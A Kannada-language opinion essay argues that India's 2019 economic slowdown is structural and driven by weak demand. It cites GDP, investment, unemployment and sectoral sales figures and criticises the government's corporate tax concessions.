ಆರ್ಥಿಕ ಮಹಾಕುಸಿತದ ದುರಂತ!

ಪ್ರಧಾನಮಂತ್ರಿ ಮತ್ತು ಆಡಳಿತ ಪಕ್ಷದ ವಕ್ತಾರರು ’70 ವರ್ಷಗಳಲ್ಲಿ ಸಾಧಿಸಿದ್ದನ್ನು ಎನ್‍ಡಿಎ-2 ಸರ್ಕಾರವು 70 ದಿನಗಳಲ್ಲಿ ಸಾಧಿಸಿದೆ’ ಎಂಬುದನ್ನು ಗರ್ವದಿಂದ ಘೋಷಿಸುತ್ತಿರುತ್ತಾರೆ. ಆದರೆ ವಾಸ್ತವವಾಗಿ ನಮ್ಮ ಆರ್ಥಿಕತೆಯಲ್ಲಿ ಸಂಭವಿಸುತ್ತಿರುವುದೇನು? ಇದನ್ನು ಸಾಧನೆ ಎಂದು ಹೇಳಿಕೊಳ್ಳಬಹುದೆ? ಪ್ರಸ್ತುತ ಪ್ರಬಂಧದಲ್ಲಿ ಇಂದು ನಮ್ಮ ಆರ್ಥಿಕತೆಯು ಎದುರಿಸುತ್ತಿರುವ ಮಹಾ ಕುಸಿತದ ಕಾರಣ ಮತ್ತು ಪರಿಣಾಮಗಳನ್ನು ಪರಿಶೀಲಿಸಲಾಗಿದೆ.

ಕಳೆದ ಆಗಸ್ಟ್ 23 ರಂದು ನಮ್ಮ ಆರ್ಥಿಕತೆ ಎದುರಿಸುತ್ತಿರುವ ಆರ್ಥಿಕ ಮಹಾ ಕುಸಿತದ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ವಿತ್ತಮಂತ್ರ್ರಿ ನಿರ್ಮಲಾ ಸೀತಾರಾಮನ್ ಪತ್ರಿಕಾಗೋಷ್ಠಿಯನ್ನುದ್ದೇಶಿಸಿ ಮಾತನಾಡುತ್ತಾ, ‘ಜಗತ್ತಿನಲ್ಲಿ ಆರ್ಥಿಕತೆಗಳು ಅಭದ್ರವಾಗಿದ್ದರೆ ಭಾರತದ ಆರ್ಥಿಕತೆ ಸುಭದ್ರವಾಗಿದೆ’, ‘ಜಗತ್ತಿನಲ್ಲ್ಲಿಯೇ ಅತಿ ವೇಗವಾಗಿ ಬೆಳೆಯುತ್ತಿರುವ ಬೃಹತ್ ಆರ್ಥಿಕತೆ ನಮ್ಮದು’ ಎಂದು ಹೇಳಿದಾಗ ನನಗೆ ಜ್ಞಾಪಕ ಬಂದುದು ‘ಹೊಟ್ಟೆಗೆ ಹಿಟ್ಟಿಲ್ಲದಿದ್ದರೂ ಜುಟ್ಟಿಗೆ ಮಲ್ಲಿಗೆ ಹೂವು’ ಎಂಬ ಕನ್ನಡ ನಾಣ್ಣುಡಿ. ಹೀಗೆ ‘ನಮ್ಮದು ಜಗತ್ತಿನಲ್ಲಿಯೇ ಅತಿವೇಗವಾಗಿ ಬೆಳೆಯುತ್ತಿರುವ ಆರ್ಥಿಕತೆ’ ಎಂದು ವಿತ್ತಮಂತ್ರಿ ಹೇಳುತ್ತಿದ್ದರೆ ನೀತಿ ಆಯೋಗದ ಉಪಾಧ್ಯಕ್ಷರು ಧೈರ್ಯದಿಂದ, ‘ಕಳೆದ 70 ವರ್ಷಗಳಲ್ಲಿ ಮೊದಲ ಬಾರಿಗೆ ಹಿಂದೆಂದೂ ಕಂಡರಿಯದ ಆರ್ಥಿಕ ಕುಸಿತವನ್ನು ನಮ್ಮ ದೇಶ ಇಂದು ಎದುರಿಸುತ್ತಿದೆ’ ಎಂದು ಪ್ರತಿಪಾದಿಸುತ್ತಾರೆ. ಹಣಕಾಸು ಸಚಿವಾಲಯದ ಮಾಜಿ ಆರ್ಥಿಕ ಸಲಹೆಗಾರ ಅರವಿಂದ್ ಸುಬ್ರಮಣಿಯನ್ ಅವರು ‘ಭಾರತದ ಒಟ್ಟು ಆಂತರಿಕ ಉತ್ಪನ್ನ(ಜಿಡಿಪಿ)ದ ಬೆಳವಣಿಗೆ ದರದ ಲೆಕ್ಕಾಚಾರವು ಉತ್ರ್ಪೇಕ್ಷೆಯಿಂದ ಕೂಡಿದೆಯೆಂದೂ, ಸರ್ಕಾರ ಹೇಳುತ್ತಿರುವಂತೆ ಆರ್ಥಿಕತೆಯು ಶೇ. 7ರ ದರದಲ್ಲಿ ಬೆಳೆಯುತ್ತಿಲ್ಲವೆಂದೂ ಅದು ವಾಸ್ತವವಾಗಿ ಶೇ. 4.5 ದರದಲ್ಲಿ ಬೆಳೆಯುತ್ತಿದೆಯೆಂದೂ’ ಹೇಳುತ್ತಿದ್ದಾರೆ.

ನಿರುದ್ಯೋಗ ಪ್ರಮಾಣವನ್ನು ಮಾಪನ ಮಾಡುವುದಕ್ಕೆ ಸರ್ಕಾರವು ನೇಮಿಸಿದ್ದ ರಾಷ್ಟ್ರೀಯ ಸಾಂಖ್ಯಿಕ ಆಯೋಗದ ವರದಿಯನ್ನು, ಅದರಲ್ಲಿನ ‘ಸತ್ಯಾಂಶ’ಗಳು ಸರ್ಕಾರಕ್ಕೆ ಮುಜುಗರ ಉಂಟು ಮಾಡುತ್ತವೆ ಎಂಬ ಕಾರಣಕ್ಕೆ ಬಿಡುಗಡೆ ಮಾಡದಿದ್ದಾಗ ಅದರ ಇಬ್ಬರು ತಜ್ಞ ಸದಸ್ಯರು ರಾಜೀನಾಮೆ ನೀಡಿ ಆಯೋಗದಿಂದ ಹೊರಬಂದರು. ನಮ್ಮ ಸರ್ಕಾರವು ಆರ್ಥಿಕ ದತ್ತಾಂಶದ ಬಗ್ಗೆ ರಾಷ್ಟ್ರೀಯ ಮತ್ತು ಜಾಗತಿಕ ತಜ್ಞರಲ್ಲಿ ಮತ್ತು ಸಂಸ್ಥೆಗಳಲ್ಲಿ ಅನುಮಾನ ಉಂಟಾಗುವಂತೆ ಮಾಡಿದ್ದಕ್ಕೆ ಮೇಲಿನ ಸಂಗತಿಗಳು ಸಾಕ್ಷಿಗಳಾಗಿವೆ.

‘ಸತ್ಯ’ವನ್ನು ಹೆಚ್ಚು ದಿನ ಮುಚ್ಚಿಡುವುದಕ್ಕೆ ಸಾಧ್ಯವಿಲ್ಲ ಎಂಬುದಕ್ಕೆ ನಿರುದ್ಯೋಗದ ವಸ್ತುಸ್ಥಿತಿ ಇಂದು ಜಗಜ್ಜಾಹೀರಾಗಿರುವುದು ಮತ್ತು ಸರ್ಕಾರವೂ ಕಳೆದ 45 ವರ್ಷಗಳಲ್ಲಿ ಆರ್ಥಿಕತೆ ಇಂದು ಎದುರಿಸುತ್ತಿರುವ ‘ನಿರುದ್ಯೋಗ’ ಅತ್ಯಧಿಕ ಎಂಬುದು ಸಾಕ್ಷಿಯಾಗಿದೆ. ಈ ವರದಿ ಪ್ರಕಾರ ನಮ್ಮ ಆರ್ಥಿಕತೆಯಲ್ಲಿ 2018ರಲ್ಲಿ ನಿರುದ್ಯೋಗ ಪ್ರಮಾಣ ಶೇ. 6.1 ಮತ್ತು ಇದು ಕಳೆದ 45 ವರ್ಷಗಳಲ್ಲಿ ಅತ್ಯಧಿಕವಾದುದಾಗಿದೆ.

ಆರ್ಥಿಕ ಮಹಾ ಕುಸಿತದ ಮೂಲ

ಅಭಿವೃದ್ಧಿಯ ಒಂದು ಪ್ರಮುಖ ಚಾಲಕ ಶಕ್ತಿಯೆಂದರೆ ಒಟ್ಟು ಸ್ಥಿರ ಬಂಡವಾಳ ಸಂಚಯ. ಈ ಸಂಚಯ ಅಧಿಕಮಟ್ಟದಲ್ಲಿದ್ದರೆ ಆರ್ಥಿಕ ಬೆಳವಣಿಗೆಯು ಅಧಿಕಮಟ್ಟದಲ್ಲಿರುತ್ತದೆ. ಕೋಷ್ಟಕದಲ್ಲಿ ನಮ್ಮ ಆರ್ಥಿಕತೆಯಲ್ಲಿನ ಜಿಡಿಪಿಯಲ್ಲಿ ವಿವಿಧ ವಲಯಗಳ ಒಟ್ಟು ಸ್ಥಿರ ಬಂಡವಾಳ ಸಂಚಯದ ಪ್ರಮಾಣ ಎಷ್ಟಿದೆ ಎಂಬುದನ್ನು ಶೇಕಡಾವಾರು ತೋರಿಸಲಾಗಿದೆ.
ಕೋಷ್ಟಕ 1.

ವಿವಿಧ ವಲಯಗಳು     ಒಟ್ಟು ಸ್ಥಿರ ಬಂಡವಾಳ ಸಂಚಯದ ಪ್ರಮಾಣ
 2011-12    2015-16    2017-18
ಒಟ್ಟು    34.3  28.7  28.6
ಸಾರ್ವಜನಿಕ    7.3  7.5  7.2
ಖಾಸಗಿ ಕಾರ್ಪೋರೇಟ್  11.2  11.9 11.2
ಕೌಟುಂಬಿಕ  15.7 9.4 10.3
ಮೂಲ: ಸಿ.ರಂಗರಾಜನ್ ಮತ್ತು ಡಿ.ಕೆ.ಶ್ರೀವಾಸ್ತವ

ನಮ್ಮ ಜಿಡಿಪಿಯಲ್ಲಿ ಬಂಡವಾಳ ಹೂಡಿಕೆ ಪ್ರಮಾಣ 2011-12ರಲ್ಲಿ ಜಿಡಿಪಿಯ ಶೇ.34.3 ರಷ್ಟಿದ್ದುದು 2017-18ರಲ್ಲಿ ಶೇ.28.6ಕ್ಕೆ ಕುಸಿದಿದೆ. ಆದರೆ ಈ ಕುಸಿತವು ಕೇವಲ ಕೌಟುಂಬಿಕ ವಲಯದಲ್ಲಿ ಬಂಡವಾಳ ಹೂಡಿಕೆ ಕಡಿಮೆಯಾಗಿರುವುದರ ಪರಿಣಾಮವಾಗಿದೆ. ಸಾರ್ವಜನಿಕ ಹಾಗೂ ಖಾಸಗಿ ಕಾರ್ಪೋರೇಟ್ ವಲಯಗಳಲ್ಲಿ ಇದು ಸ್ಥಿರವಾಗುಳಿದಿದೆ. ಕಳೆದ ಐದು ವರ್ಷಗಳಲ್ಲಿ ಕೌಟುಂಬಿಕ ಬಂಡವಾಳ ಹೂಡಿಕೆಯು ಶೇ.5.4 ಅಂಶಗಳಷ್ಟು ಕುಸಿದಿದೆ. ಇದಕ್ಕೆ ಮುಖ್ಯ ಕಾರಣ ಜನರ ಕೈಯಲ್ಲಿ ಉದ್ಯೋಗಗಳಿಲ್ಲ ಮತ್ತು ಅವರ ಬೊಕ್ಕಣಗಳಲ್ಲಿ ರೊಕ್ಕವಿಲ್ಲ (ಇದನ್ನು ತಜ್ಞರು ‘ಉದ್ಯೋಗರಹಿತ ಆರ್ಥಿಕ ಬೆಳವಣಿಗೆ’ ಎನ್ನುತ್ತಾರೆ). ಆದರೆ ಆರ್ಥಿಕ ಕುಸಿತವನ್ನು ಎದುರಿಸುವುದಕ್ಕೆ ನಮ್ಮ ವಿತ್ತ್ತ ಮಂತ್ರಿಗಳು ಕಾರ್ಪೋರೇಟ್ ವಲಯಕ್ಕೆ ಮತ್ತು ವಿದೇಶಿ ಹೂಡಿಕೆದಾರರಿಗೆ ತೆರಿಗೆ ವಿನಾಯಿತಿ ನೀಡುವ ಕ್ರಮ ಕೈಗೊಂಡಿದ್ದಾರೆ. ಇದು ಬಿಕ್ಕಟ್ಟನ್ನು ಮತ್ತಷ್ಟು ಉಲ್ಬಣಗೊಳಿಸುತ್ತದೆ ವಿನಾ ಪರಿಹರಿಸುವುದಿಲ್ಲ. ಏಕೆಂದರೆ…

1. ತೆರಿಗೆ ವಿನಾಯಿತಿಗಳಿಂದ ಸರ್ಕಾರದ ಸಂಪನ್ಮೂಲ ಕಡಿಮೆಯಾಗುತ್ತದೆ. ಇದರ ಪರಿಣಾಮವಾಗಿ ಸಾರ್ವಜನಿಕ ವೆಚ್ಚ ಕುಸಿಯುತ್ತದೆ. ಜಿಡಿಪಿಯಲ್ಲಿ ಕೇಂದ್ರದ ಸಾರ್ವಜನಿಕ ವೆಚ್ಚವು 2013-14ರಲ್ಲಿ ಜಿಡಿಪಿಯ ಶೇ.14.64 ರಷ್ಟಿದ್ದುದು 2019-20ರಲ್ಲಿ ಶೇ.13.19ಕ್ಕಿಳಿದಿದೆ. ಬಜೆಟ್ಟಿನಲ್ಲಿ ಬಂಡವಾಳ ವೆಚ್ಚವು 2013-14ರಲ್ಲಿ ಜಿಡಿಪಿಯ ಶೇ.2.01 ರಷ್ಟಿದ್ದುದು 2019-2020ರಲ್ಲಿ ಶೇ.1.60ಕ್ಕಿಳಿದಿದೆ.

2. ಸಾರ್ವಜನಿಕ ವೆಚ್ಚದ ಕಡಿತದಿಂದಾಗಿ ಆರ್ಥಿಕತೆಯಲ್ಲಿ ಸಮಗ್ರ ಬೇಡಿಕೆಯು ಕುಸಿಯುತ್ತ್ತಿದೆ.

3. ತೆರಿಗೆ ವಿನಾಯಿತಿಗಳು ಸಾರಾಸಗಟು ನೇರ ತೆರಿಗೆಗಳಿಗೆ ಸಂಬಂಧಿಸಿವೆ. ಇದು ಉದ್ದಿಮೆಗಾರರಿಗೆ ಮತ್ತು ಬೃಹತ್ ಬಂಡವಾಳಗಾರರಿಗೆ ಅನುಕೂಲ ಒದಗಿಸುತ್ತದೆ. ಆದರೆ ಕಾರ್ಮಿಕರು-ಕೂಲಿಕಾರರು (ಬಡಜನರು) ಮಾತ್ರ  ಅಪ್ರತ್ಯಕ್ಷ ತೆರಿಗೆಗಳನ್ನು ಜಿಎಸ್‍ಟಿ ಪರಿಣಾಮವಾಗಿ ಹೆಚ್ಚುಹೆಚ್ಚು ತೆರಬೇಕಾಗಿದೆ. ಇದರ ಪರಿಣಾಮವಾಗಿ ಜನರ ‘ಕೊಳ್ಳುವ ಶಕ್ತಿ’ ಕ್ಷೀಣಿಸುತ್ತಿದೆ.

ಮೊದಲ ತ್ರೈಮಾಸಿಕದಲ್ಲಿ ಜಿಡಿಪಿ ದಾಖಲೆ ಕುಸಿತ!

ನಮ್ಮ ಆರ್ಥಿಕತೆಯ 2019-2020ರ ಮೊದಲ ತ್ರೈಮಾಸಿಕದ (ಏಪ್ರಿಲ್-ಜೂನ್) ಜಿಡಿಪಿ ಬೆಳವಣಿಗೆ ದರ (2011-12ರ ಸ್ಥಿರ ಬೆಲೆಗಳಲ್ಲಿ) ಕಳೆದ ಆರು ವರ್ಷಗಳಲ್ಲಿಯೇ ಅತ್ಯಂತ ಕೆಳಮಟ್ಟದ ಶೇ.5 ರಷ್ಟಾಗಿದೆ. ಇದು 2018-19ರ ಮೊದಲ ತ್ರೈಮಾಸಿಕದಲ್ಲಿ ಶೇ.8ರಷ್ಟಿತ್ತು. ಅಂದರೆ ಕಳೆದ ಒಂದು ವರ್ಷದಲ್ಲಿ ಜಿಡಿಪಿಯು ಶೇ.3 ಅಂಶಗಳಷ್ಟು ಕುಸಿದಿದೆ. ಅಲ್ಲಿಂದ ಸತತವಾಗಿ ಐದು ತ್ರೈಮಾಸಿಕಗಳಲ್ಲಿ ಅದು ಕುಸಿಯುತ್ತಾ ನಡೆದಿದೆ.

ಈಗ ಚೀನಾದ ವರಮಾನದ ಬೆಳವಣಿಗೆ ದರ ಶೇ.6.2ರಷ್ಟಾಗಿದೆ. ಅಂದರೆ ಇನ್ನುಮೇಲೆ ವಿತ್ತಮಂತ್ರಿ ನಿರ್ಮಲಾ ಸೀತಾರಾಮನ್ ಅವರಿಗೆ ‘ಜಗತ್ತಿನಲ್ಲಿಯೇ ಅತಿ ವೇಗವಾಗಿ ಬೆಳೆಯುತ್ತಿರುವ ಬೃಹತ್ ಆರ್ಥಿಕತೆ ನಮ್ಮದು’ ಎಂದು ಹೇಳುವುದು ಸಾಧ್ಯವಾಗುವುದಿಲ್ಲ. ಚಾಲ್ತಿ ಬೆಲೆಗಳಲ್ಲಿ ಇದು 2002-03ರ ನಂತರ ಅತ್ಯಂತ ಕೆಳಮಟ್ಟದ ಜಿಡಿಪಿ ಬೆಳವಣಿಗೆಯಾಗಿದೆ. ಜಿಡಿಪಿ ತಜ್ಞ ಆರ್.ನಾಗರಾಜ್ ಪ್ರಕಾರ ಅಸಮಾನತೆಯು ತಾಂಡವವಾಡುತ್ರಿರುವ ನಮ್ಮ ಸಮಾಜದಲ್ಲಿ ಜಿಡಿಪಿಯಲ್ಲಿನ ಕುಸಿತದಿಂದ ಬಡವರ ಬದುಕು ನುಚ್ಚುನೂರಾಗುತ್ತದೆ ಮತ್ತು ಬಡತನ ರೇಖೆಯ ಕೆಳಗೆ ಬದುಕುತ್ತಿರುವವರ ಸಂಖ್ಯೆಯಲ್ಲಿ ಏರಿಕೆಯಾಗುತ್ತದೆ.

ನಮ್ಮ ಆರ್ಥಿಕತೆಯಲ್ಲಿ ಖಾಸಗಿ ಅಂತಿಮ ಅನುಭೋಗ ವೆಚ್ಚವು 2019-20ರ ಮೊದಲ ತ್ರೈಮಾಸಿಕದಲ್ಲಿ ಶೇ.3.75ರಷ್ಟು ಕುಸಿದಿದೆ. ಕೇಂದ್ರದ ಆರ್ಥಿಕ ಸಲಹಾ ಸಮಿತಿಯ ಬಿಬೇಕ್ ಡೆಬ್‍ರಾಯ್ ಪ್ರಕಾರ, ‘ಜಿಡಿಪಿಯ ಕುಸಿತದ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ನಿರಾಶೆ-ಹತಾಶೆಯ ಮಾತುಗಳನ್ನಾಡುವುದು ದೇಶಕ್ಕೆ ಅನ್ಯಾಯ ಮಾಡಿದಂತೆ’. ಅಂದರೆ ಯಾರೂ ಕೇಂದ್ರದ ಬಗ್ಗೆ ಟೀಕೆ ಮಾಡಬಾರದು ಎಂಬುದು ಇವರ ಇರಾದೆ! ಈ ಆರ್ಥಿಕ ಮಹಾಕುಸಿತವು ‘ರಾಚನಿಕ’ (ಸ್ಟ್ರಕ್ಚರಲ್) ಎಂಬುದು ಅತ್ಯಂತ ಸ್ಪಷ್ಟವಾಗುತ್ತಿದ್ದರೂ ಆರ್‍ಬಿಐ ಇದನ್ನು ‘ಆವರ್ತನೀಯ’ (ಸೈಕ್ಲಿಕಲ್) ಎಂದು ಹೇಳುತ್ತಿದೆ. ‘ಜೆಟ್ಟಿ ನೆಲಕ್ಕೆ ಬಿದ್ದರೂ ಮೀಸೆ ಮಣ್ಣಾಗಲಿಲ್ಲ’ ಎಂಬಂತಿದೆ ಇವರ ಮಾತುಗಳು.

ಆರ್ಥಿಕತೆಯಲ್ಲಿ ಶೇ.60 ರಿಂದ ಶೇ.70ರಷ್ಟು ವಂಚಿತ ವರ್ಗದ ವರಮಾನದ ಮಟ್ಟವನ್ನು ಎಲ್ಲಿಯವರೆಗೆ ಏರಿಸುವುದಿಲ್ಲವೋ ಅಲ್ಲಿಯವರೆಗೆ ಸಮಗ್ರ ಬೇಡಿಕೆ ಬಲಗೊಳ್ಳುವುದಿಲ್ಲ. ಕೌಟುಂಬಿಕ ವಲಯದ ವರಮಾನವು ಕೆಳಮಟ್ಟದಲ್ಲಿರುವುದರಿಂದ ಅವರ ಉಳಿತಾಯದ ಪ್ರಮಾಣ ಕುಸಿದಿದೆ. ಜಿಡಿಪಿಯಲ್ಲಿ ಒಟ್ಟು ಆಂತರಿಕ ಉಳಿತಾಯದ ಪ್ರಮಾಣ 2011-12ರಲ್ಲಿ ಶೇ.34.6 ರಷ್ಟಿದ್ದುದು 2017-18ರಲ್ಲಿ ಶೇ.30.5ಕ್ಕೆ ಕುಸಿದಿದೆ. ಇಂದಿನ ಆರ್ಥಿಕ ಬಿಕ್ಕಟ್ಟಿನ ಮೂಲವಿರುವುದು ಸಮಗ್ರ ಬೇಡಿಕೆಯಲ್ಲಿ ಎಂಬುದು ಸಾಮಾನ್ಯ ಅರ್ಥಶಾಸ್ತ್ರದ ವಿದ್ಯಾರ್ಥಿಗೂ ಗೊತ್ತಾಗುತ್ತದೆ. ಬಡವರ, ವಂಚಿತರ, ಭೂರಹಿತ ಕೂಲಿಕಾರರ ಮತ್ತು ಮಹಿಳೆಯರ ಬವಣೆಗೆ ಬೆನ್ನು ತಿರಿವಿರುವ ಕೇಂದ್ರದ ಕ್ರಮಗಳು ಆರ್ಥಿಕತೆಯನ್ನು ಪುನಶ್ಚೇತನಗೊಳಿಸುವುದು ಸಾಧ್ಯವಿಲ್ಲ. 

ನಾವು ಗಮನಿಸಬೇಕಾದುದು ಉದ್ದಿಮೆಗಾರರೇ ಅಭಿವೃದ್ಧಿಯ ಮೂಲ ಕರ್ತೃಗಳೇನಲ್ಲ. ‘ವೆಲ್ಥ್ ಕ್ರಿಯೇಟರ್ಸ್’ ಎನ್ನುವ ಪರಿಭಾವನೆಯು ಇಂದು ಚಲಾವಣೆಗೆ ಬಂದಿದೆ. ಸರಕು-ಸೇವೆಗಳ ಉತ್ಪಾದನೆಯ ಮೂಲ ಶ್ರಮಶಕ್ತಿ ಎಂದು ಅರ್ಥಶಾಸ್ತ್ರಜ್ಞರು ಹೇಳುತ್ತಿದ್ದರೆ ಇವರು ಬಂಡವಾಳವೇ ಅದರ ಮೂಲ ಎಂದು ಹೇಳುತ್ತಿದ್ದಾರೆ. ಯಾರು ಈ ವೆಲ್ಥ್ ಕ್ರಿಯೇಟರ್ಸ್? ಈ ದೇಶದ ಬೃಹತ್ ದುಡಿಮೆಗಾರ ವರ್ಗವೇನಿದೆ (2011: 48.18 ಕೋಟಿ) ಅದು ಸಂಪತ್ತನ್ನು ಉತ್ಪಾದಿಸುವ ವರ್ಗವಾಗಿದೆ. ಆದರೆ ಸರ್ಕಾರವು ಯಾರನ್ನು ವೆಲ್ಥ್ ಕ್ರಿಯೇಟರ್ಸ್ ಎಂದು ಪರಿಗಣಿಸಿದೆಯೋ ಆ ಉಳ್ಳವರಿಗೆ ಉತ್ತೇಜನ ನೀಡುತ್ತಿದೆ. ದುಡಿಯುವ ವರ್ಗದ ಬದುಕು ಮೂರಾಬಟ್ಟೆಯಾಗಿದೆ.

ಆಕ್ಸ್‍ಫಾಮ್ ಸಂಸ್ಥೆಯ ವರದಿ ಪ್ರಕಾರ ನಮ್ಮ ದೇಶದ 2018ರ ಒಟ್ಟು ವರಮಾನದಲ್ಲಿ ಉನ್ನತ ಶ್ರೇಣಿಯಲ್ಲಿರುವ ಶೇ.10ರಷ್ಟು ಶ್ರೀಮಂತ ಕುಳಗಳು ಜಿಡಿಪಿಯಲ್ಲಿ ಶೇ.77 ರಷ್ಟು ಪಾಲು ಪಡೆಯುತ್ತಿವೆ. ಅವರ ವರಮಾನದ ಮಟ್ಟವನ್ನು ಉತ್ತಮಪಡಿಸಿದರೆ ಸಮಸ್ಯೆಯು ಬಗೆಹರಿಯುವುದಿಲ್ಲ. ಸಮಾಜದ ಅಂಚಿನಲ್ಲಿರುವ, ಅಭಿವೃದ್ಧಿಯಿಂದ ಲಾಗಾಯ್ತಿನಿಂದ ವಂಚಿತರಾಗಿರುವವರ, ಅಲ್ಪಸಂಖ್ಯಾತರ, ದಲಿತರ ಬದುಕನ್ನು ಉತ್ತಮಪಡಿಸುವುದು ಸಮಸ್ಯೆಗೆ ಪರಿಹಾರವೇ ವಿನಾ ನೇರ ತೆರಿಗೆ ವ್ಯವಸ್ಥೆಯಲ್ಲಿನ ತೇಪೆ ಕೆಲಸಗಳಲ್ಲ.

ಆರ್ಥಿಕ ಮಹಾಕುಸಿತದ ಸೂಚಿಗಳು

1. ಮೊದಲನೆಯದು ಜಿಡಿಪಿ ಬೆಳವಣಿಗೆ. ಜಿಡಿಪಿ ಬೆಳವಣಿಗೆಯು 2009-10ರಲ್ಲಿ ಶೇ.7.86 ರಷ್ಟಿದ್ದರೆ 2013-14ರಲ್ಲಿ ಶೇ.6.39ರಷ್ಟಿತ್ತು. ಮುಂದೆ 2015-16ರಲ್ಲಿ ಶೇ.8ರಷ್ಟಿದ್ದುದು 2018-19ರಲ್ಲಿ ಶೇ.6.81ಕ್ಕಿಳಿದಿದೆ. ಈಗ 2018-19ರ ಕೊನೆಯ ತ್ರೈಮಾಸಿಕದಲ್ಲಿ ಅದರ ಬೆಳವಣಿಗೆ ಶೇ.5.8 ರಷ್ಟಾಗಿದೆ. ಅದು ಇನ್ನೂ ಕೆಳಗಿಳಿದು 2019-20ರ ಮೊದಲ ತ್ರೈಮಾಸಿಕದಲ್ಲಿ ಜಿಡಿಪಿಯ ಬೆಳವಣಿಗೆ ದರ ಶೇ.5ಕ್ಕಿಳಿದಿದೆ.

2. ಕಾರುಗಳ ಮಾರಾಟದ ಪ್ರಮಾಣವು 2018ರ ಏಪ್ರಿಲ್-ಜೂನ್ ತ್ರೈಮಾಸಿಕದ ಬೆಳವಣಿಗೆಗೆ ಹೋಲಿಸಿದರೆ 2019ರ ಏಪ್ರಿಲ್-ಜೂನ್ ತ್ರೈಮಾಸಿಕದಲ್ಲಿ ಶೇ.23.3ರಷ್ಟು ಕುಸಿದಿದೆ. ಇದರ ಪರಿಣಾಮ ಟೈರು ಮತ್ತು ಸ್ಟೀಲ್ ಉದ್ದಿಮೆಯ ಉತ್ಪಾದನೆಯ ಮೇಲೆ ಬೀಳುತ್ತದೆ. ಇದರ ದುಷ್ಪರಿಣಾಮ ವಾಹನ ಮಾರಾಟಗಾರರ ಮೇಲೂ ಉಂಟಾಗುತ್ತದೆ.

3. ದ್ವ್ವಿಚಕ್ರ ವಾಹನಗಳ ಮಾರಾಟದಲ್ಲಿನ ಬೆಳವಣಿಗೆಯು 2018ರ ಏಪ್ರಿಲ್-ಜೂನ್ ತ್ರೈಮಾಸಿಕಕ್ಕೆ ಹೋಲಿಸಿದರೆ 2019ರ ಇದೇ ತ್ರೈಮಾಸಿಕದಲ್ಲಿ ದಾಖಲೆ ಪ್ರಮಾಣದಲ್ಲಿ ಕುಸಿದಿದೆ. ಮೋಪೆಡ್‍ಗಳ ಮಾರಾಟದಲ್ಲಿ ಶೇ.19.9 ರಷ್ಟು ನೆಲಕಚ್ಚಿದೆ. ಟ್ರಾಕ್ಟರುಗಳ ಮಾರಾಟವು ಇದೇ ಅವಧಿಯಲ್ಲಿ ಶೇ.14.1 ರಷ್ಟು ಕೆಳಗೆ ಬಿದ್ದಿದೆ.

4. ಸೊಸೈಟಿ ಆಫ್ ಇಂಡಿಯನ್ ಮ್ಯಾನ್ಯುಫ್ಯಾಕ್ಚರರ್ಸ್ ಪ್ರಕಾರ ವಾಹನೋದ್ಯಮದಲ್ಲಿ ಸರಿಸುಮಾರು 10 ಲಕ್ಷ ಉದ್ಯೋಗಗಳಿಗೆ ದಕ್ಕೆಯುಂಟಾಗುವ ಸಾಧ್ಯತೆಯಿದೆ.

5. ಗೃಹೋದ್ಯಮವು ತೀವ್ರ ಬೇಡಿಕೆ ಕುಸಿತವನ್ನು ಎದುರಿಸುತ್ತಿದೆ. ಒಂದು ಅಂದಾಜಿನ ಪ್ರಕಾರ 2019ರಲ್ಲಿ ಮಾರಾಟವಾಗದ ಮನೆಗಳ ಸಂಖ್ಯೆ 12.8 ಲಕ್ಷ. ಈ ಉುದ್ದಿಮೆಯ ಮೇಲೆ ಸುಮಾರು 250 ಆನ್ಸಿಲರಿ ಘಟಕಗಳು ಅವಲಂಬಿಸಿವೆ. ಇದರಿಂದ ಅಲ್ಲಿನ ಕಾರ್ಮಿಕರು ಬೀದಿಗೆ ಬೀಳುತ್ತಿದ್ದಾರೆ.

6. ಬೃಹತ್ ಉದ್ದಿಮೆಗಳಿಗೆ ನೀಡುವ ಬ್ಯಾಂಕುಗಳ ಸಾಲದ ಪ್ರಮಾಣ 2019ರಲ್ಲಿ ಶೇ.6.5ರಷ್ಟು ಏರಿಕೆ ಕಂಡಿದ್ದರೆ ಅತಿಸಣ್ಣ ಮತ್ತು ಸಣ್ಣ ಉದ್ದಿಮೆಗಳಿಗೆ ಬ್ಯಾಂಕು ಸಾಲ ನೀಡಿಕೆಯಲ್ಲಿ ಏರಿಕೆಯಾಗಿಲ್ಲ.

7. ರೈಲು ಸರಕು ಸಾಗಾಟದಲ್ಲಿಯೂ ಬೆಳವಣಿಗೆÉ ಕಾಣುತ್ತಿಲ್ಲ. ಕಳೆದ 2018ರ ಏಪ್ರಿಲ್-ಜೂನ್ ತ್ರೈಮಾಸಿಕದಲ್ಲಿ ರೈಲುಗಳ ಮೂಲಕ ಸಾಗಿಸುವ ಕಲ್ಲಿದ್ದಲು, ಬೀಡುಕಬ್ಬಿಣ, ಸಿಮೆಂಟ್, ಪೆಟ್ರೋಲಿಯಮ್, ರಸಾಯಿನಿಕ ಗೊಬ್ಬರ ಮುಂತಾದವುಗಳ ಸಾಗಣಿಕೆ ಬೆಳವಣಿಗೆ ಶೇ.6.4ರಷ್ಟಿದ್ದುದು 2019ರ ಇದೇ ತ್ರೈಮಾಸಿಕದಲ್ಲಿ ಇದು ಶೇ.2.7ರಷ್ಟಾಗಿದೆ.

8. ನಿವ್ವಳ ರಫ್ತು ಮೊತ್ತ 2018ರ ಮೊದಲ ತ್ರೈಮಾಸಿಕದಲ್ಲಿ ಎಷ್ಟಿತ್ತೊ 2019ರ ಮೊದಲ ತ್ರೈಮಾಸಿಕದಲ್ಲಿಯೂ ಅಷ್ಟೇ ಇದೆ.

9. ತೆರಿಗೆ ಸಂಗ್ರಹದ ಬೆಳವಣಿಗೆಯು 2018ರ ಏಪ್ರಿಲ್-ಜೂನ್ ತ್ರೈಮಾಸಿಕದಲ್ಲಿ ಶೇ.22ರಷ್ಟಿದ್ದುದು 2019ರ ಮೊದಲ ತ್ರೈಮಾಸಿಕದಲ್ಲಿ ಅದರ ಬೆಳವಣಿಗೆಯು ಅತ್ಯಧಿಕ ಕೆಳಮಟ್ಟದ ಶೇ.1.5ರಷ್ಟಿದೆ.

